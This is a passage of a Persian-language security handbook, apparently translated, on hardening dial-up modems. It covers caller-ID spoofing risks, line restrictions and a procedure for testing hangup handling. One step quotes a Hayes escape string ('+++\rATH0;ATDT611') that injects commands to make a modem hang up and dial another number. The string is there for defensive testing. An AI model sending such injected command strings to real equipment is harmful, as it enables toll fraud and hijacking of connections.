ﻣﻮﺍﺯﻱ ﺑﺎ ﻣﻮﺩﻡ ﺍﻭﻝ ﻧﺼﺐ ﻛﻨﻴﺪ ،ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﺯﻧﮓ ﺳﻮﻡ ﻳﺎ ﭼﻬﺎﺭﻡ ﺑﻪ ﻣﻮﺩﻡ ﺍﻭﻝ ﭘﺎﺳﺦ ﺩﻫﺪ ،ﻭ ﺍﺯ
ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺛﺎﻟﺚ ﻭ ﻣﻮﺩﻡ ﺩﻭﻡ ﺑﺮﺍﻱ ﺛﺒﺖ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ .ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﺩﻭ ﻓﺎﻳﻞ ﺛﺒﺖ ﺭﺍ
ﺧﻮﺩﺗﺎﻥ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﻭ ﻳﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺍﺑﺰﺍﺭ ﻣﺨﺼﻮﺹ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺗﺮﻛﻴﺐ ﻛﻨﻴﺪ.
٢٤١
ﺳﻴﺴﺘﻢ ISDNﻭ ﭼﻨﺪ ﺳﻴﺴﺘﻢ ﺩﻳﮕﺮ ﺗﻠﻔﻨﻲ ،ﻗﺎﺑﻠﻴﺖ ﺩﻳﮕﺮﻱ ﺑﻪ ﻧﺎﻡ ﮔﺮﻭﻫﻬﺎﻱ ﺗﻤﺎﺱ ﻣﺤﺪﻭﺩ ﻧﻴﺰ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ .ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ •
ﺷﻤﺎ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻴﺪ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺷﻤﺎﺭﻩﺗﻠﻔﻨﻬﺎ ﻣﺸﺨﺺ ﺳﺎﺯﻳﺪ ﻛﻪ ﻣﺠﺎﺯ ﺑﻪ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺑﺎ ﻣﻮﺩﻡ ﻫﺴﺘﻨﺪ ﻭ ﭘﺲ ﺍﺯ
ﻓﻌﺎﻝ ﺷﺪﻥ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ،ﺗﻤﺎﻡ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩﻫﺎﻱ ﺩﻳﮕﺮ ﻣﺴﺪﻭﺩ ﺧﻮﺍﻫﻨﺪ ﺷﺪ.
ﺧﺪﻣﺎﺕ ﺗﻠﻔﻨﻲ ﭘﻴﺸﺮﻓﺘﺔ ﺍﻳﻨﭽﻨﻴﻨﻲ ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺯﻳﺮﺑﻨﺎﻱ ﺷﺒﻜﺔ ﺗﻠﻔﻨﻲ ﺧﻮﺩ ﺍﻣﻦ ﺑﺎﺷﻨﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﻠﻔﻨﻲ ﺷﺮﻛﺘﻬﺎ
ﺑﻪ ﻣﺸﺘﺮﻛﻴﻦ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﺗﺎ ﺍﻃﻼﻋﺎﺕ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﻛﻪ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺗﻠﻔﻦ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﻣﻲﺁﻳﺪ ﺭﺍ ﺧﻮﺩﺷﺎﻥ ﺗﻌﻴﻴﻦ ﻛﻨﻨﺪ؛ ﻭ
ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﻣﻬﺎﺟﻤﺎﻧﻲ ﻛﻪ ﻛﻨﺘﺮﻝ ﺳﻴﺴﺘﻢ ﺗﻠﻔﻨﻲ ﺷﺮﻛﺖ ﺭﺍ ﺩﺭ ﺩﺳﺖ ﺑﮕﻴﺮﻧﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﻧﺮﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻧﻤﺎﻳﻨﺪ ﻛﻪ ﻫﺮ ﺷﻤﺎﺭﺓ
ﺩﻟﺨﻮﺍﻩ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﺁﻭﺭﺩ ،ﻭ ﻟﺬﺍ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻗﺎﺩﺭ ﻫﺴﺘﻨﺪ ﺍﺯ ﺳﺪ ﻫﺮ ﺳﻴﺴﺘﻢ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺗﻨﻬﺎ ﺑﻪ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﻭ ﻳﺎ
ﮔﺮﻭﻫﻬﺎﻱ ﺗﻤﺎﺱ ﻣﺤﺪﻭﺩ ﻣﺘﻜﻲ ﺑﺎﺷﺪ ﻋﺒﻮﺭ ﻛﻨﻨﺪ.
•
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺩﺭ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﺧﻄﻮﻁ ﺗﻠﻔﻦ ﻛﻪ ﻗﺮﺍﺭ ﻧﻴﺴﺖ ﺑﺎ ﺁﻧﻬﺎ ﺑﺘﻮﺍﻥ ﺗﻤﺎﺳﻬﺎﻱ ﺭﺍﻩ ﺩﻭﺭ ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩ ،ﺍﻣﻜﺎﻥ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻭﺟﻮﺩ
ﻼ ﻟﺰﻭﻣﻲ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺧﻄﻮﻁ ﺗﻠﻔﻦ ﻋﺎﺩﻱ ﺷﻤﺎ ﻗﺎﺑﻠﻴﺖ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺭﺍﻩ ﺩﻭﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ. ﻧﺪﺍﺭﺩ .ﺷﺎﻳﺪ ﺍﺻ ﹰ
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧﻄﻮﻁ ﺗﻠﻔﻨﻲ ﻛﻪ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺗﻤﺎﺳﻬﺎﻱ ﺩﺭﻳﺎﻓﺘﻲ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﻧﻤﻲﺗﻮﺍﻥ ﺗﻤﺎﺳﻲ ﺑﺎ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ •
ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩ.
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺧﻄﻮﻁ ﺗﻠﻔﻨﻲ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﺗﻤﺎﺱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﺓ ﻫﻴﭻ ﺗﻤﺎﺳﻲ ﺑﺎﺷﻨﺪ. •
"ﻫﺪﺍﻳﺖ ﺗﻤﺎﺱ" ﻗﺎﺑﻠﻴﺘﻲ ﺍﺳﺖ ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻥ ﺑﻪ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ.
ﺍﺯ ﺷﺮﻛﺖ ﺗﻠﻔﻦ ﺧﻮﺩ ﺑﺨﻮﺍﻫﻴﺪ ﻗﺎﺑﻠﻴﺖ ﭘﺮﺩﺍﺧﺖ ﺷﺨﺺ ﺛﺎﻟﺚ ﺭﺍ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﺪ
ﺑﺪﻭﻥ ﻭﺟﻮﺩ ﻗﺎﺑﻠﻴﺖ ﭘﺮﺩﺍﺧﺖ ﺷﺨﺺ ﺛﺎﻟﺚ ،ﺍﻓﺮﺍﺩ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﻫﺰﻳﻨﺔ ﺗﻤﺎﺳﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﮔﺮﺩﻥ ﺧﻂ ﺗﻠﻔﻦ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﻮﺩﻡ ﺷﻤﺎ ﺑﻴﻨﺪﺍﺯﻧﺪ.
ﺁﺯﻣﻮﺩﻥ ﻣﻮﺩﻣﻬﺎ
ﭘﺲ ﺍﺯ ﺍﺗﺼﺎﻝ ﻣﻮﺩﻡ ،ﺑﺎﻳﺪ ﺗﻮﺍﻧﺎﻳﻲ ﺁﻥ ﺩﺭ ﺑﺮﻗﺮﺍﺭﻱ ﻭ ﺩﺭﻳﺎﻓﺖ ﺗﻤﺎﺱ ﺭﺍ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺑﻴﺎﺯﻣﺎﻳﻴﺪ .ﺍﻭﻝ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻣﻮﺩﻡ ﺩﺭ ﺷﺮﺍﻳﻂ
ﻋﺎﺩﻱ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﻋﻤﻞ ﻣﻲﻛﻨﺪ .ﭘﺲ ﺍﺯ ﺁﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﺩﺭ ﺣﺎﻟﺘﻲ ﻛﻪ ﺣﺎﺩﺛﺔ ﻏﻴﺮﻣﻨﺘﻈﺮﻩﺍﻱ ﺭﺥ ﻣﻲﺩﻫﺪ ،ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺕ
ﻭﺍﻛﻨﺶ ﻗﺎﺑﻞ ﻗﺒﻮﻟﻲ ﺩﺍﺭﺩ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔﺮ ﺍﺭﺗﺒﺎﻁ ﺗﻠﻔﻨﻲ ﻗﻄﻊ ﺷﻮﺩ ،ﺭﺍﻳﺎﻧﻪ ﺑﺎﻳﺪ ﺗﻤﺎﻡ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻥ ﺍﺭﺗﺒﺎﻁ ﺗﻠﻔﻨﻲ ﺭﺍ ﺍﺯ ﺣﺎﻓﻈﻪ
ﻭ ﻛﺎﺭﺑﺮ ﻣﺮﺑﻮﻃﻪ ﺭﺍ ﺍﺯ ﺳﻴﺴﺘﻢ ﺧﺎﺭﺝ ﻛﻨﺪ ،ﻧﻪ ﺍﻳﻨﻜﻪ ﺍﺟﺎﺯﻩ ﺩﻫﺪ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﺓ ﺑﻌﺪﻱ ﺑﻪ ﺩﺳﺘﻮﺭﭘﺮﺩﺍﺯ ٢٤٢ﻛﺎﺭﺑﺮ ﻗﺒﻠﻲ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﺑﻴﺸﺘﺮ ﺍﻳﻦ ﺁﺯﻣﺎﻳﺸﻬﺎ ﺑﻤﻨﻈﻮﺭ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﺭﺳﺎﻝ ﺻﺤﻴﺢ ﺳﻴﮕﻨﺎﻟﻬﺎﻱ ﻛﻨﺘﺮﻟﻲ ﻣﻮﺩﻡ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺖ )ﺑﻄﻮﺭﻳﻜﻪ ﺭﺍﻳﺎﻧﻪ ﻫﻤﻮﺍﺭﻩ ﺍﺯ ﺑﺮﻗﺮﺍﺭ ﺑﻮﺩﻥ
ﺗﻤﺎﺱ ﺍﻃﻼﻉ ﺩﺍﺭﺩ( ،ﻭ ﻧﻴﺰ ﺍﻳﻨﻜﻪ ﺭﺍﻳﺎﻧﻪ ﺑﺎ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ،ﺍﺯ ﺧﻮﺩ ﺭﻓﺘﺎﺭ ﺻﺤﻴﺤﻲ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ.
ﺁﺯﻣﻮﻥ ﺷﺮﻭﻉ
ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻣﻮﺩﻡ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺗﻨﻈﻴﻢ ﻛﺮﺩﻩﺍﻳﺪ ،ﻻﺯﻡ ﺍﺳﺖ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ ﻫﻢ ﺩﺭ ﺯﻣﺎﻥ ﺍﻳﺠﺎﺩ ﻭ ﻫﻢ ﺩﺭ ﺯﻣﺎﻥ ﻗﻄﻊ
ﺗﻤﺎﺳﻬﺎ ،ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﻋﻤﻞ ﻣﻲﻛﻨﺪ .ﺑﺮﺍﻱ ﺁﺯﻣﻮﺩﻥ ﻣﻮﺩﻡ ،ﺑﺎﻳﺪ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮﻱ ﻛﻪ ﺍﺯ ﻗﺒﻞ ﻣﻲﺩﺍﻧﻴﺪ ﺑﺪﺭﺳﺘﻲ ﺭﻓﺘﺎﺭ ﻣﻲﻛﻨﺪ ﺗﻤﺎﺱ
ﺑﮕﻴﺮﻳﺪ) .ﺑﺎ ﻫﻤﺎﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺍﺯ ﺁﻥ ﺗﻤﺎﺱ ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﺗﻤﺎﺱ ﺑﺮﻗﺮﺍﺭ ﻧﺴﺎﺯﻳﺪ؛ ﭼﺮﺍﻛﻪ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺍﮔﺮ ﻣﺸﻜﻠﻲ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ ﻣﺘﻮﺟﻪ ﻧﺨﻮﺍﻫﻴﺪ ﺷﺪ ﻛﻪ
ﺍﺷﻜﺎﻝ ﻛﺎﺭ ﺍﺯ ﻛﺠﺎ ﺍﺳﺖ(.
ﻋﻤﻠﻴﺎﺕ ﺁﺯﻣﻮﻥ ﺭﺍ ﺑﺪﻳﻨﺼﻮﺭﺕ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ:
ﺳﻌﻲ ﻛﻨﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺷﺒﻴﻪﺳﺎﺯ ﭘﺎﻳﺎﻧﻪ ،ﺑﺎ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ .ﻫﺮ ﺑﺎﺭ ﻛﻪ ﺭﺍﻳﺎﻧﻪ ﭘﺎﺳﺦ ﻣﻲﺩﻫﺪ ﻗﺎﻋﺪﺗﹰﺎ .١
ﻳﻚ ﺍﻋﻼﻥ ﻭﺭﻭﺩ ٢٤٣ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ .ﺩﺭ ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﺷﻤﺎ ﺑﺎﻳﺪ ﻗﺎﺩﺭ ﺑﺎﺷﻴﺪ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﻭﺍﺭﺩ ﺷﻮﻳﺪ ﻭ ﻃﻮﺭﻱ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ
ﻛﻨﻴﺪ ﻛﻪ ﮔﻮﻳﻲ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﻪ ﺁﻥ ﻣﺘﺼﻞ ﻫﺴﺘﻴﺪ.
ﺍﺗﺼﺎﻝ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺭﺍ ﺑﺎ ﺩﺭﺁﻭﺭﺩﻥ ﺳﻴﻢ ﺗﻠﻔﻦ ﺍﺯ ﻣﻮﺩﻣﻲ ﻛﻪ ﺍﺭﺗﺒﺎﻁ ﺭﺍ ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩﻩ ﻗﻄﻊ ﻛﻨﻴﺪ .ﺑﺮﻧﺎﻣﺔ ﭘﺎﻳﺎﻧﻪ ﺑﺎﻳﺪ ﻣﺘﻮﺟﻪ .٢
ﻗﻄﻊﺷﺪﻥ ﺍﺗﺼﺎﻝ ﺑﺸﻮﺩ.
ﺑﺎﺭ ﺩﻳﮕﺮ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ ﻭ ﺑﺎ ﺧﺎﻣﻮﺵ ﻛﺮﺩﻥ ﻣﻮﺩﻡ ﺍﺗﺼﺎﻝ ﺭﺍ ﻗﻄﻊ ﻛﻨﻴﺪ .ﻣﺠﺪﺩﹰﺍ ﺑﺮﻧﺎﻣﻪ ﺑﺎﻳﺪ ﻣﺘﻮﺟﻪ ﻣﻮﺿﻮﻉ ﺑﺸﻮﺩ. .٣
ﻣﺠﺪﺩﹰﺍ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ .ﺍﻳﻨﺒﺎﺭ ﻫﻤﻴﻨﻄﻮﺭ ﻛﻪ ﺍﺗﺼﺎﻝ ﺗﻠﻔﻨﻲ ﺑﺮﻗﺮﺍﺭ ﺍﺳﺖ ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﺧﺎﺭﺝ ﺷﻮﻳﺪ .ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﻣﻮﺩﻡ ﺑﺎﻳﺪ .٤
ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺍﺭﺗﺒﺎﻁ ﺭﺍ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﻗﻄﻊ ﻛﻨﺪ.
ﺑﺮﺍﻱ ﺁﺧﺮﻳﻦ ﺑﺎﺭ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ .ﺍﻳﻨﺒﺎﺭ ﺍﺗﺼﺎﻝ ﺭﺍ ﺑﺼﻮﺭﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻭ ﺑﺎ killﻛﺮﺩﻥ ﭘﺮﺩﺍﺯﺓ ﭘﺎﻳﺎﻧﻪ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ )ﻳﺎ .٥
ﺍﺯ ﭘﺎﻳﺎﻧﻪﺍﻱ ﺩﻳﮕﺮ ﻭ ﻳﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺮﻧﺎﻣﺔ Task Managerﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺤﺖ (Windowsﻗﻄﻊ ﻛﻨﻴﺪ .ﺑﺎﺯ ﻫﻢ ﻣﻮﺩﻡ ﺑﺎﻳﺪ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ
ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺭﺍ ﻗﻄﻊ ﻧﻤﺎﻳﺪ.
ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ ﺑﻪ ﺷﺮﺡ ﺯﻳﺮ ﻫﺴﺘﻨﺪ:
ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﻫﻴﭻ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﺣﺎﻟﺖ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻣﻮﺩﻡ ﺑﺎ ﻓﺮﺳﺘﺎﺩﻥ ﺭﺷﺘﻪﻫﺎﻱ ﻓﺮﺍﺭ ٢٤٤ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ .ﻳﻚ ﺭﺷﺘﺔ •
ﻼ ﺑﻴﺸﺘﺮ
ﻓﺮﺍﺭ ،ﺩﻧﺒﺎﻟﻪﺍﻱ ﺍﺯ ﻛﺎﺭﺍﻛﺘﺮﻫﺎ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﻛﻨﺘﺮﻝ ﻣﻮﺩﻡ ﺭﺍ ﺑﺪﺳﺖ ﮔﺮﻓﺘﻪ ﻭ ﺁﻧﺮﺍ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻛﻨﻴﺪ .ﻣﺜ ﹰ
ﻣﻮﺩﻣﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺳﺮﻱ ﺩﺳﺘﻮﺭﺍﺕ ") "ATﻛﻪ ﺗﻮﺳﻂ ﺷﺮﻛﺖ ﺳﺎﺯﻧﺪﺓ ﻣﻮﺩﻡ Hayesﻃﺮﺍﺣﻲ ﺷﺪﻩ( ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ،ﺑﺎ ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﻭﻗﻔﺔ
ﻱ ﺩﻳﮕﺮ ،ﺑﻪ ﺣﺎﻟﺖ ﺳﻪﺛﺎﻧﻴﻪﺍﻱ ،ﺍﺭﺳﺎﻝ ﺳﻪ ﻋﻼﻣﺖ ﻣﺜﺒﺖ )ﻛﺎﺭﺍﻛﺘﺮ ﭘﻴﺶﻓﺮﺽ ﻓﺮﺍﺭ( ﺑﺼﻮﺭﺕ ﭘﺸﺖ ﺳﺮﻫﻢ؛ ﻭ ﻳﻚ ﻭﻗﻔﺔ ﺳﻪﺛﺎﻧﻴﻪﺍ ﹺ
ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻣﻲﺭﻭﻧﺪ .ﺍﮔﺮ ﻣﻮﺩﻡ ﺷﻤﺎ ﺩﺭ ﻭﺍﻛﻨﺶ ﺑﻪ ﺍﻳﻦ ﻭﺭﻭﺩﻱ ﭘﺎﺳﺦ " "OKﺑﺪﻫﺪ ،ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺑﺎ ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﺭﺷﺘﺔ ﻓﺮﺍﺭ ﻗﺎﺑﻞ
ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻣﻲﺑﺎﺷﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﻨﺘﺮﻝ ﻣﻮﺩﻡ ﺗﺤﺖ UNIXﺭﺷﺘﺔ ﻓﺮﺍﺭ ﻣﻮﺩﻡ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻣﻲﻛﻨﻨﺪ .ﺍﮔﺮ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ
ﻓﻌﺎﻝ ﻧﺸﺪﻩ ﺑﺎﺷﺪ ،ﺩﺭ ﺑﺮﺧﻲ ﺍﺯ ﻣﻮﺩﻣﻬﺎ ﺩﺭﻳﺎﻓﺖ ﺭﺷﺘﺔ " "+++\rATH0;ATDT611ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻣﻮﺩﻡ ﺍﺗﺼﺎﻝ ﻓﻌﻠﻲ ﺭﺍ ﻗﻄﻊ
ﻛﺮﺩﻩ ﻭ ﺑﺎ ﺷﻤﺎﺭﺓ " "٦١١ﻛﻪ ﺷﻤﺎﺭﺓ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺗﻌﻤﻴﺮ ﺗﻠﻔﻦ ﺍﺳﺖ ﺗﻤﺎﺱ ﺑﮕﻴﺮﺩ) .ﺩﺭ ﺑﺮﺧﻲ ﺍﺯ ﻣﻮﺩﻣﻬﺎ ﺑﺎﻳﺪ ﻣﻴﺎﻥ " "+++ﻭ " "\rﻳﻚ ﻣﻜﺚ
ﺳﻪﺛﺎﻧﻴﻪﺍﻱ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺩﺭ ﺑﺮﺧﻲ ﺧﻴﺮ ،ﭼﺮﺍﻛﻪ ﻓﺎﺻﻠﺔ ﺳﻪﺛﺎﻧﻴﻪﺍﻱ ﺗﻮﺳﻂ Hayesﺑﻪ ﺛﺒﺖ ﺭﺳﻴﺪﻩ ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻣﻮﺩﻡ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺘﻪﺍﻧﺪ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ﻣﻮﺩﻡ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻫﻤﺰﻣﺎﻥ ﺭﺍ ﺑﺪﺭﺳﺘﻲ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﺟﺪﺍ ﻣﻲﻛﻨﺪ ﻳﺎ ﺧﻴﺮ .ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻫﻴﭻ ﺭﺍﻫﻲ ﺑﺮﺍﻱ •
ﻛﺎﺭﺑﺮﺍﻥ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﻣﻮﺩﻣﻲ ﻛﻪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﻛﺎﺭﺑﺮ ﺩﻳﮕﺮﻱ ﺍﺳﺖ ﺩﺳﺘﺮﺳﻲ ﻳﺎﺑﻨﺪ.
ﺍﮔﺮ ﭘﺲ ﺍﺯ ﻗﻄﻊﺷﺪﻥ ﺗﻠﻔﻦ ،ﺑﺮﻧﺎﻣﺔ ﭘﺎﻳﺎﻧﻪ ﺍﺯ ﺣﺎﻓﻈﻪ ﺧﺎﺭﺝ ﻧﺸﻮﺩ ﻭ ﻳﺎ ﺍﮔﺮ ﺑﺎ ﻓﺮﺳﺘﺎﺩﻥ ﻳﻚ ﺭﺷﺘﺔ ﻓﺮﺍﺭ ﺍﻣﻜﺎﻥ ﺑﺎﺯﮔﺸﺖ ﻣﻮﺩﻡ ﺑﻪ ﺣﺎﻟﺖ
ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﺭﺑﺮ ﺑﺘﻮﺍﻧﺪ ﺗﻤﺎﺳﻬﺎﻳﻲ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ ﻛﻪ ﻫﻴﭽﻴﻚ ﺑﻪ ﺛﺒﺖ ﻧﺮﺳﻨﺪ .ﺍﻳﻦ ﻛﺎﺭﺑﺮ ﺣﺘﻲ ﻣﻤﻜﻦ ﺍﺳﺖ
